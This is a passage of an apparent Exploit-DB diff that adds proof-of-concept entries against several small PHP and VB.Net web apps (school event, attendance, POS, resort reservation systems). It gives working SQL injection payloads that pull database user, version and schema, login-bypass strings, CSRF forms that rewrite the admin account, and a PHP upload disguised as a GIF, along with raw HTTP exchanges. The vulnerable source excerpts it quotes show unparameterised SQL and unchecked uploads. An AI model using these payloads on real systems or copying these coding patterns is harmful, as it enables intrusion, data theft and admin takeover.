 Content-Type: application/x-www-form-urlencoded
 Content-Length: 280
 division=2'||(SeleCT%20'Efe'%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))||'&submit=Submit
 HTTP/1.1 200 OK
 Date: Mon, 29 Oct 2018 00:58:26 GMT
 Server: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/7.1.22
 X-Powered-By: PHP/7.1.22
 Content-Length: 1313
 Keep-Alive: timeout=5, max=100
 Connection: Keep-Alive
 Content-Type: text/html; charset=UTF-8
 # POC: 
 # 5)
 # http://localhost/[PATH]/submit_feedback.php
 # 
 POST /[PATH]/submit_feedback.php HTTP/1.1
 Host: TARGET
 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Connection: keep-alive
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 279
 roll_no=2'||(SeleCT%20'Efe'%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))||'&submit=Submit
 HTTP/1.1 200 OK
 Date: Mon, 29 Oct 2018 00:58:33 GMT
 Server: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/7.1.22
 X-Powered-By: PHP/7.1.22
 Content-Length: 1314
 Keep-Alive: timeout=5, max=100
 Connection: Keep-Alive
 Content-Type: text/html; charset=UTF-8
--- a/exploits/php/webapps/45713.txt
+++ b/exploits/php/webapps/45713.txt
@ -0,0 +1,37 @@
 # Exploit Title: Card Payment 1.0 - Cross-Site Request Forgery (Update Admin)
 # Dork: N/A
 # Date: 2018-10-29
 # Exploit Author: Ihsan Sencan
 # Vendor Homepage: https://www.sourcecodester.com/users/janobe
 # Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/tubigangarden.zip
 # Version: 1.0
 # Category: Webapps
 # Tested on: WiN7_x64/KaLiLinuX_x64
 # CVE: N/A
 # POC: 
 # 1)
 # http://localhost/[PATH]/admin/mod_users/controller.php?action=edit
 # 
 POST /[PATH]/admin/mod_users/controller.php?action=edit HTTP/1.1
 Host: TARGET
 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Cookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3
 Connection: keep-alive
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 106
 USERID=1&UNAME=Anonymous&USERNAME=admin&deptid=&UPASS=Efe&ROLE=Administrator&deptid=&PHONE=912856478&save=
 HTTP/1.1 200 OK
 Date: Sun, 28 Oct 2018 20:16:05 GMT
 Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
 X-Powered-By: PHP/5.6.30
 Expires: Thu, 19 Nov 1981 08:52:00 GMT
 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
 Pragma: no-cache
 Content-Length: 57
 Keep-Alive: timeout=5, max=100
 Connection: Keep-Alive
 Content-Type: text/html; charset=UTF-8
--- a/exploits/php/webapps/45717.txt
+++ b/exploits/php/webapps/45717.txt
@ -0,0 +1,11 @@
 # Exploit Title: MOGG web simulator Script - SQL Injection
 # Date: 2018-10-29
 # Exploit Author: Meisam Monsef - meisamrce@gmail.com - @meisamrce -
@dorsateam
 # Vendor Homepage: https://github.com/spider312/mtgas
 # Version: All Version
 Exploit :
 http://server/play.php?id=99999'+[SQL Command]+#
 http://server/play.php?id=99999%27+and+extractvalue(1,concat(0x3a,user(),0x3a))%23
--- a/exploits/php/webapps/45718.txt
+++ b/exploits/php/webapps/45718.txt
@ -0,0 +1,56 @@
 # Exploit Title: Aplaya Beach Resort Online Reservation System 1.0 - Multiple Vulnerabilities
 # Dork: N/A
 # Date: 2018-10-29
 # Exploit Author: Ihsan Sencan
 # Vendor Homepage: https://www.sourcecodester.com/users/janobe
 # Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/aplaya.zip
 # Version: 1.0
 # Category: Webapps
 # Tested on: WiN7_x64/KaLiLinuX_x64
 # CVE: N/A
 # POC: 
 # 1)
 # http://localhost/[PATH]/admin/mod_users/controller.php?action=edit
 # 
 POST /[PATH]/admin/mod_users/controller.php?action=edit HTTP/1.1
 Host: TARGET
 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Connection: keep-alive
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 114
 account_id=5&name=Janno%2BPalacios&deptid=&username=efe%40omerefe.com&deptid=&pass=efe&type=Administrator&save=
 HTTP/1.1 200 OK
 Date: Mon, 29 Oct 2018 08:20:21 GMT
 Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
 X-Powered-By: PHP/5.6.30
 Set-Cookie: PHPSESSID=7v7av68r870gj66ouhf1sk3260; path=/
 Expires: Thu, 19 Nov 1981 08:52:00 GMT
 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
 Pragma: no-cache
 Content-Length: 57
 Keep-Alive: timeout=5, max=100
 Connection: Keep-Alive
 Content-Type: text/html; charset=UTF-8
 # POC: 
 # 2)
 # http://localhost/[PATH]/admin/mod_room/controller.php?action=editimage
 # 
 <html>
 <body>
 <form action="http://localhost/[PATH]/admin/mod_room/controller.php?action=editimage" enctype="multipart/form-data" method="POST">
 <input id="image" name="image" type="file"></td>
 <button name="save" type="submit">Save</button>
 </form>
 </body>
 </html>
 # POC: 
 # 3)
 # http://localhost/[PATH]/admin/mod_room/index.php?view=view&id=[SQL]
 # 
 #....
--- a/exploits/php/webapps/45719.txt
+++ b/exploits/php/webapps/45719.txt
@ -0,0 +1,119 @@
 # Exploit Title: Curriculum Evaluation System 1.0 - SQL Injection
 # Dork: N/A
 # Date: 2018-10-29
 # Exploit Author: Ihsan Sencan
 # Vendor Homepage: https://www.sourcecodester.com/users/janobe
 # Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/curriculumevaluationsystem_0.zip
 # Version: 1.0
 # Category: Windows
 # Tested on: WiN7_x64/KaLiLinuX_x64
 # CVE: CVE-2018-18803
 # POC: 
 # 1)
 # User: 'or 1=1 or ''='
 # ' AnD EXTRAcTVaLUE(22,CoNCaT(0x5c,veRSion(),(SElECT (ElT(1=1,1))),database()))-- Efe
 # POC: 
 # 2)
 # User: 'or 1=1 or ''='
 # Pass: Null
 # 
 # https://2.bp.blogspot.com/-4O0oZTFkzJE/W9Y4HWcImQI/AAAAAAAAEN4/5P-n-9H6JAQMiN6UpJu340xI4x_-MSjHACLcBGAs/s1600/sql5.png
 #[PATH]/frmCourse.vb
 #....
 #47     Private Sub txtSearch_TextChanged(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles txtSearch.TextChanged
 #48         sql = "Select * From tblcourse WHERE Course Like '%" & txtSearch.Text & "%'"
 #49         reloadDtg(sql, dtglist)
 #50     End Sub
 #....
 #[PATH]/includes/user.vb
 #....
 #05     Public Sub login(ByVal username As Object, ByVal pass As Object)
 #06         Try
 #07 
 #08             con.Open()
 #09             reloadtxt("SELECT * FROM `tbluseraccount` WHERE User_name= '" & username & "' and Pass = sha1('" & pass & "')")
 #10 
 #11 
 #12             If dt.Rows.Count > 0 Then
 #13                 If dt.Rows(0).Item("UserType") = "Administrator" Then
 #14                     MsgBox("Welcome " & dt.Rows(0).Item("UserType"))
 #15                     'Form1.Text = "User :" & dt.Rows(0).Item("Fullname")
 #16                     With Form1
 #17                         .tsAddG.Enabled = True
 #18                         .tsStudent.Enabled = True
 #19                         .tsCurriculum.Enabled = True
 #20                         .tsGrades.Enabled = True
 #21                         .tsReport.Enabled = True
 #22                         .tsUtilities.Enabled = True
 #23                         .tsSearchStudent.Enabled = True
 #24                         .tsLogin.Image = My.Resources.logout
 #25                         .tsLogin.Text = "Logout"
 #26                     End With
 #27 
 #28 
 #29                     LoginForm1.Close()
 #30 
 #31 
 #32                 ElseIf dt.Rows(0).Item("UserType") = "Faculty" Then
 #33 
 #34                     MsgBox("Welcome " & dt.Rows(0).Item("UserType"))
 #35                     'Form1.Text = "User :" & dt.Rows(0).Item("Fullname")
 #36                     With Form1
 #37                         .tsAddG.Enabled = True
 #38                         .tsStudent.Enabled = True
 #39                         .tsCurriculum.Enabled = True
 #40                         .tsGrades.Enabled = True
 #41                         .tsReport.Enabled = True
 #42                         .tsSearchStudent.Enabled = True
 #43                         .tsLogin.Image = My.Resources.logout
 #44                         .tsLogin.Text = "Logout"
 #45                     End With
 #46 
 #47 
 #48 
 #49 
 #50                     LoginForm1.Close()
 #51 
 #52 
 #53 
 #54                 ElseIf dt.Rows(0).Item("UserType") = "Assistant" Then
 #55                     MsgBox("Welcome " & dt.Rows(0).Item("UserType"))
 #56                     'With Form1
 #57                     With Form1
 #58                         .tsAddG.Enabled = True
 #59                         .tsStudent.Enabled = True
 #60                         .tsCurriculum.Enabled = True
 #61                         .tsGrades.Enabled = True
 #62                         .tsReport.Enabled = True
 #63 
 #64                         .tsSearchStudent.Enabled = True
 #65                         .tsLogin.Image = My.Resources.logout
 #66                         .tsLogin.Text = "Logout"
 #67                     End With
 #68 
 #69 
 #70                     LoginForm1.Close()
 #71                 End If
 #72 
 #73                 'Form1.UserIdToolStripStatus.Text = dt.Rows(0).Item("UserId")
 #74                 'Form1.UserToolStripStatus.Text = dt.Rows(0).Item("Fullname")
 #75                 'Form1.StatusStrip1.Visible = True
 #76                 'inserting logs
 #77                 'sql = "INSERT INTO `tbllogs` (`UserId`, `LogDate`,LogMode) " & _
 #78                 '   " VALUES ('" & dt.Rows(0).Item("UserId") & "',Now(),'Logged in')"
 #79                 'create(sql)
 #80 
 #81             Else
 #82                 MsgBox("Acount doest not exist!", MsgBoxStyle.Information)
 #83             End If
 #84         Catch ex As Exception
 #85             MsgBox(ex.Message)
 #86         End Try
 #87         con.Close()
 #88         da.Dispose()
 #89     End Sub
 #....
--- a/exploits/php/webapps/45720.txt
+++ b/exploits/php/webapps/45720.txt
@ -0,0 +1,73 @@
 # Exploit Title: Bakeshop Inventory System in VB.Net and MS Access Database 1.0 - SQL Injection
 # Dork: N/A
 # Date: 2018-10-29
 # Exploit Author: Ihsan Sencan
 # Vendor Homepage: https://www.sourcecodester.com/users/janobe
 # Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/bakeshopinventory1.0.zip
 # Version: 1.0
 # Category: Windows
 # Tested on: WiN7_x64/KaLiLinuX_x64
 # CVE: CVE-2018-18804
 # POC: 
 # 1)
 # User: 'or 1=1 or ''='
 # Pass: 'or 1=1 or ''='
 # 
 # https://2.bp.blogspot.com/-xjiRUlpkNGc/W9Ywmp79JpI/AAAAAAAAENs/3UDWxFvuTfcJrEKDU9TUxJRpoT8T6yLLwCLcBGAs/s1600/sql4.png
 # 
 #[PATH]/include/publicfunction.vb
 #....
 #237     Public Sub LoginUser(ByVal userid As Object, ByVal pass As Object)
 #238         Try
 #239             con.Open()
 #240 
 #241             cmd = New OleDb.OleDbCommand
 #242             With cmd
 #243                 .Connection = con
 #244                 .CommandText = "SELECT * FROM tblUser WHERE U_UNAME ='" & userid.Text & "' AND U_PASS = '" & pass.Text & "'"
 #245             End With
 #246 
 #247             da = New OleDb.OleDbDataAdapter
 #248             da.SelectCommand = cmd
 #249             dt = New DataTable
 #250             da.Fill(dt)
 #251 
 #252             If dt.Rows.Count > 0 Then
 #253 
 #254                 If dt.Rows(0).Item("U_TYPE") = "Administrator" Then
 #255 
 #256                     MsgBox("You login as administrator!!")
 #257 
 #258                     ShowForm(LoginForm1, Form1)
 #259 
 #260 
 #261                     LoginForm1.Hide()
 #262                 ElseIf dt.Rows(0).Item("U_TYPE") = "Staff" Then
 #263 
 #264                     MsgBox("You login as Staff!!")
 #265 
 #266                     With Form1
 #267                         '.ManageUsersToolStripMenuItem.Visible = False
 #268 
 #269                     End With
 #270 
 #271                     ShowForm(LoginForm1, Form1)
 #272 
 #273 
 #274                     LoginForm1.Hide()
 #275                 End If 
 #276 
 #277             Else
 #278                 MsgBox("Account does not exists.", MsgBoxStyle.Exclamation)
 #279             End If
 #280 
 #281         Catch ex As Exception
 #282 
 #283             MsgBox(ex.Message)
 #284         Finally
 #285             con.Close()
 #286             da.Dispose()
 #287         End Try
 #288     End Sub
 #....
--- a/exploits/php/webapps/45721.txt
+++ b/exploits/php/webapps/45721.txt
@ -0,0 +1,43 @@
 # Exploit Title: Point of Sales (POS) in VB.Net MySQL Database 1.0 - SQL Injection
 # Dork: N/A
 # Date: 2018-10-29
 # Exploit Author: Ihsan Sencan
 # Vendor Homepage: https://www.sourcecodester.com/users/janobe
 # Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/poinofsales_0.zip
 # Version: 1.0
 # Category: Windows
 # Tested on: WiN7_x64/KaLiLinuX_x64
 # CVE: CVE-2018-18805
 # POC: 
 # 1)
 # User: '||(SEleCT 'Efe' FRoM DuaL WheRE 113=113 AnD (SEleCT 64 FRom(SELeCT CoUNT(*),ConCAT(ConCAT(0x203a20,UsER(),DAtABAsE(),VErSIoN()),(SelEcT (ELT(64=64,1))),FLooR(RAnD(0)*2))x FrOM INFOrMATIoN_SchEMA.pLUGINS GroUP By x)a))||'
 # Pass: Null
 # 
 # https://2.bp.blogspot.com/-qlfhS-GUaCQ/W9Yt3aHdLHI/AAAAAAAAENg/Hmxj2lZ62cYITPlTNaNrwwAgh379Cbi8ACLcBGAs/s1600/sql3.png
 # 
 #[PATH]/LoginForm1.vb
 #....
 #11     Private Sub OK_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles OK.Click
 #12         sql = "SELECT * FROM `tblemployee` WHERE `USERNAME` ='" & UsernameTextBox.Text & "' and `PASSWRD` = sha1('" & PasswordTextBox.Text & "')"
 #13         janobefindthis(sql)
 #14 
 #15         If GetNumRows() = 1 Then
 #16             LoadSingleResult("login")
 #17             ' MsgBox(fullname)
 #18             Form1.statsloginname.Text = fullname
 #19             Form1.tsLogin.Text = "Logout"
 #20 
 #21             If usertype = "Administrator" Then
 #22                 Visible_Admin(True)
 #23             Else
 #24                 Visible_Cashier(True)
 #25             End If
 #26         Else
 #27             MsgBox("Username or Password not registered!")
 #28         End If
 #29 
 #30 
 #31         Me.Close()
 #32     End Sub
 #....
--- a/exploits/php/webapps/45722.txt
+++ b/exploits/php/webapps/45722.txt
@ -0,0 +1,108 @@
 # Exploit Title: School Event Management System 1.0 - SQL Injection
 # Dork: N/A
 # Date: 2018-10-29
 # Exploit Author: Ihsan Sencan
 # Vendor Homepage: https://www.sourcecodester.com/users/janobe
 # Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/sems_1.zip
 # Version: 1.0
 # Category: Webapps
 # Tested on: WiN7_x64/KaLiLinuX_x64
 # CVE: CVE-2018-18795
 # POC: 
 # 1)
 # http://localhost/[PATH]/student/index.php?view=view&id=[SQL]
 # 
 #[PATH]/student/view.php
 #01 <?php  
 #02     $student = New Student();
 #03     $res = $student->select_student($_GET['id']);
 #04 
 #05      
 #06     $course = New Course();
 #07     $resCourse = $course->single_course($res->CourseID);
 #08 
 #09    ?>
 GET /[PATH]/student/index.php?view=view&id=-1%27++uniOn+seLecT+%31%2c(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)%2c%33%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2d%2d%20%2d HTTP/1.1
 Host: TARGET
 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Cookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3
 Connection: keep-alive
 HTTP/1.1 200 OK
 Date: Sun, 28 Oct 2018 17:02:29 GMT
 Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
 X-Powered-By: PHP/5.6.30
 Expires: Thu, 19 Nov 1981 08:52:00 GMT
 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
 Pragma: no-cache
 Keep-Alive: timeout=5, max=82
 Connection: Keep-Alive
 Transfer-Encoding: chunked
 Content-Type: text/html; charset=UTF-8
 # POC: 
 # 2)
 # http://localhost/[PATH]/event/index.php?view=view&id=[SQL]
 # 
 #[PATH]/event/view.php
 #01 <?php  
 #02     $event = New Event();
 #03     $res = $event->single_event($_GET['id']);
 #04 
 #05  
 #06 
 #07    ?>
 GET /[PATH]/event/index.php?view=view&id=-1%27++uniOn+seLecT+%31%2c(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)%2c%33%2c%34%2c%35%2c%36%2c%37%2d%2d%20%2d HTTP/1.1
 Host: TARGET
 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Cookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3
 Connection: keep-alive
 HTTP/1.1 200 OK
 Date: Sun, 28 Oct 2018 17:12:15 GMT
 Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
 X-Powered-By: PHP/5.6.30
 Expires: Thu, 19 Nov 1981 08:52:00 GMT
 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
 Pragma: no-cache
 Keep-Alive: timeout=5, max=100
 Connection: Keep-Alive
 Transfer-Encoding: chunked
 Content-Type: text/html; charset=UTF-8
 # POC: 
 # 3)
 # http://localhost/[PATH]/user/index.php?view=view&id=[SQL]
 # 
 #[PATH]/user/view.php
 #01 <?php  
 #02     $user = New User();
 #03     $res = $user->single_user($_GET['id']);
 #04 
 #05    
 #06 
 #07    ?>
 GET /[PATH]/user/index.php?view=view&id=-1%27++uniOn+seLecT+%31%2c(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)%2c%33%2c%34%2c%35%2c%36%2c%37%2d%2d%20%2d HTTP/1.1
 Host: TARGET
 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Cookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3
 Connection: keep-alive
 HTTP/1.1 200 OK
 Date: Sun, 28 Oct 2018 17:16:52 GMT
 Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
 X-Powered-By: PHP/5.6.30
 Expires: Thu, 19 Nov 1981 08:52:00 GMT
 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
 Pragma: no-cache
 Keep-Alive: timeout=5, max=100
 Connection: Keep-Alive
 Transfer-Encoding: chunked
 Content-Type: text/html; charset=UTF-8
--- a/exploits/php/webapps/45723.txt
+++ b/exploits/php/webapps/45723.txt
@ -0,0 +1,89 @@
 # Exploit Title: School Event Management System 1.0 - Arbitrary File Upload
 # Dork: N/A
 # Date: 2018-10-29
 # Exploit Author: Ihsan Sencan
 # Vendor Homepage: https://www.sourcecodester.com/users/janobe
 # Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/sems_1.zip
 # Version: 1.0
 # Category: Webapps
 # Tested on: WiN7_x64/KaLiLinuX_x64
 # CVE: CVE-2018-18793
 # POC: 
 # 1)
 # http://localhost/[PATH]/event/controller.php?action=photos
 # 
 GIFefe
 <?php
 .....
 ?>
 # http://localhost/[PATH]/event/photo/[FILE]
 # 
 #[PATH]/event/controller.php
 #....
 #29	function doInsert(){
 #30	if(isset($_POST['save'])){
 #31  
 #32 
 #33	$errofile = $_FILES['image']['error'];
 #34	$type = $_FILES['image']['type'];
 #35	$temp = $_FILES['image']['tmp_name'];
 #36	$myfile =$_FILES['image']['name'];
 #37	$location="photo/".$myfile;
 #38	
 #39	@$file=$_FILES['image']['tmp_name'];
 #40	@$image= addslashes(file_get_contents($_FILES['image']['tmp_name']));
 #41	@$image_name= addslashes($_FILES['image']['name']); 
 #42	@$image_size= getimagesize($_FILES['image']['tmp_name']);
 #....
 GET /[PATH]/event/controller.php?action=photos HTTP/1.1
 Host: TARGET
 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Cookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3
 Connection: keep-alive
 Content-Type: multipart/form-data; boundary=
 ---------------------------3634372676911755021110261466
 Content-Length: 617
 -----------------------------3634372676911755021110261466
 Content-Disposition: form-data; name="EventID"
 1
 -----------------------------3634372676911755021110261466
 Content-Disposition: form-data; name="MAX_FILE_SIZE"
 1000000
 -----------------------------3634372676911755021110261466
 Content-Disposition: form-data; name="photo"; filename="phpinfo_gif.php"
 Content-Type: application/force-download
 GIFefe
 <?php
 phpinfo();
 ?>
 -----------------------------3634372676911755021110261466
 Content-Disposition: form-data; name="savephoto"
 -----------------------------3634372676911755021110261466--
 HTTP/1.1 200 OK
 Date: Sun, 28 Oct 2018 17:27:54 GMT
 Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
 X-Powered-By: PHP/5.6.30
 Expires: Thu, 19 Nov 1981 08:52:00 GMT
 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
 Pragma: no-cache
 Content-Length: 143
 Keep-Alive: timeout=5, max=100
 Connection: Keep-Alive
 Content-Type: text/html; charset=UTF-8
 # POC: 
 # 2)
 <html>
 <body>
 <form action="http://localhost/[PATH]/event/controller.php?action=photos" enctype="multipart/form-data" method="post">
 <input name="EventID" id="EventID" value="1" type="hidden">
 <input name="MAX_FILE_SIZE" value="1000000" type="hidden"> 
 <input id="photo" name="photo" type="file">
 <button name="savephoto" type="submit">Upload Photo</button>
 </form>
 </body>
 </html>
--- a/exploits/php/webapps/45724.txt
+++ b/exploits/php/webapps/45724.txt
@ -0,0 +1,84 @@
 # Exploit Title: School Event Management System 1.0 - Cross-Site Request Forgery (Update Admin)
 # Dork: N/A
 # Date: 2018-10-29
 # Exploit Author: Ihsan Sencan
 # Vendor Homepage: https://www.sourcecodester.com/users/janobe
 # Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/sems_1.zip
 # Version: 1.0
 # Category: Webapps
 # Tested on: WiN7_x64/KaLiLinuX_x64
 # CVE: CVE-2018-18794
 # POC: 
 # 1)
 # .../[PATH]user/user/edit.php
 #02      if (!isset($_SESSION['ACCOUNT_ID'])){
 #03       redirect(web_root."index.php");
 #04      }
 #05 
 #06   @$USERID = $_GET['id'];
 #07     if($USERID==''){
 #08   redirect("index.php");
 #09 }
 #10   $user = New User();
 #11   $singleuser = $user->single_user($USERID);
 # .../[PATH]user/controller.php
 #80 $user = New User(); 
 #81 $user->ACCOUNT_NAME 		= $_POST['U_NAME'];
 #82 $user->ACCOUNT_USERNAME		= $_POST['U_USERNAME'];
 #83 $user->ACCOUNT_PASSWORD		=sha1($_POST['U_PASS']);
 #84 $user->ACCOUNT_TYPE			= $_POST['U_ROLE'];
 #85 $user->update($_POST['USERID']);
 #86 
 #87 message("[". $_POST['U_NAME'] ."] has been updated!", "success");
 #88 redirect("index.php");
 # ...
 <html>
 <body>
 <form action="http://localhost/[PATH]/user/controller.php?action=edit" method="POST">
 <input id="USERID" name="USERID" placeholder="Account Id" type="Hidden" value="1">
 <input name="U_NAME" placeholder="Account Name" type="text" value="admin">
 <input name="deptid" type="hidden" value="">
 <input name="U_USERNAME" placeholder="Username" type="text" value="admin">
 <input name="deptid" type="hidden" value="">
 <input name="U_PASS" placeholder="Account Password" type="Password" value="">
 <input name="deptid" type="hidden" value="">
 <input id="RU_PASS" name="RU_PASS" placeholder="Re-type Password" type="Password" value="">
 <select name="U_ROLE" id="U_ROLE">
 <option value="Administrator">Administrator</option>
 <option value="SSG">SSG</option>
 </select> 
 <button id="save" name="save" type="submit">Save</button> 
 </body>
 </html>
 POST /[PATH]/user/controller.php?action=edit HTTP/1.1
 Host: 192.168.1.27
 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Cookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3
 Connection: keep-alive
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 136
 USERID=1&U_NAME=admin_test&deptid=&U_USERNAME=admin_test&deptid=&U_PASS=admin_test&deptid=&RU_PASS=admin_test&U_ROLE=Administrator&save=
 HTTP/1.1 200 OK
 Date: Sun, 28 Oct 2018 17:57:48 GMT
 Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
 X-Powered-By: PHP/5.6.30
 Expires: Thu, 19 Nov 1981 08:52:00 GMT
 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
 Pragma: no-cache
 Content-Length: 128
 Keep-Alive: timeout=5, max=100
 Connection: Keep-Alive
 Content-Type: text/html; charset=UTF-8
 /* `exploitdb`.`useraccounts` */
 $useraccounts = array(
  array('ACCOUNT_ID' => '1','ACCOUNT_NAME' => 'admin_test','ACCOUNT_USERNAME' => 'admin_test','ACCOUNT_PASSWORD' => '3f72bcb53fb301af20d78d152456d901c30a43b3','ACCOUNT_TYPE' => 'Administrator','EMPID' => '1234','USERIMAGE' => 'photos/import2.png')
 );
--- a/exploits/php/webapps/45725.txt
+++ b/exploits/php/webapps/45725.txt
@ -0,0 +1,84 @@
 # Exploit Title: School Attendance Monitoring System 1.0 - Cross-Site Request Forgery (Update Admin)
 # Dork: N/A
 # Date: 2018-10-29
 # Exploit Author: Ihsan Sencan
 # Vendor Homepage: https://www.sourcecodester.com/users/janobe
 # Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/attendancemonitoring.zip
 # Version: 1.0
 # Category: Webapps
 # Tested on: WiN7_x64/KaLiLinuX_x64
 # CVE: CVE-2018-18797
 # POC: 
 # 1)
 # .../[PATH]/user/user/edit.php
 #02      if (!isset($_SESSION['ACCOUNT_ID'])){
 #03       redirect(web_root."index.php");
 #04      }
 #05 
 #06   @$USERID = $_GET['id'];
 #07     if($USERID==''){
 #08   redirect("index.php");
 #09 }
 #10   $user = New User();
 #11   $singleuser = $user->single_user($USERID);
 # .../[PATH]/user/controller.php
 #80 $user = New User(); 
 #81 $user->ACCOUNT_NAME 		= $_POST['U_NAME'];
 #82 $user->ACCOUNT_USERNAME		= $_POST['U_USERNAME'];
 #83 $user->ACCOUNT_PASSWORD		=sha1($_POST['U_PASS']);
 #84 $user->ACCOUNT_TYPE			= $_POST['U_ROLE'];
 #85 $user->update($_POST['USERID']);
 #86 
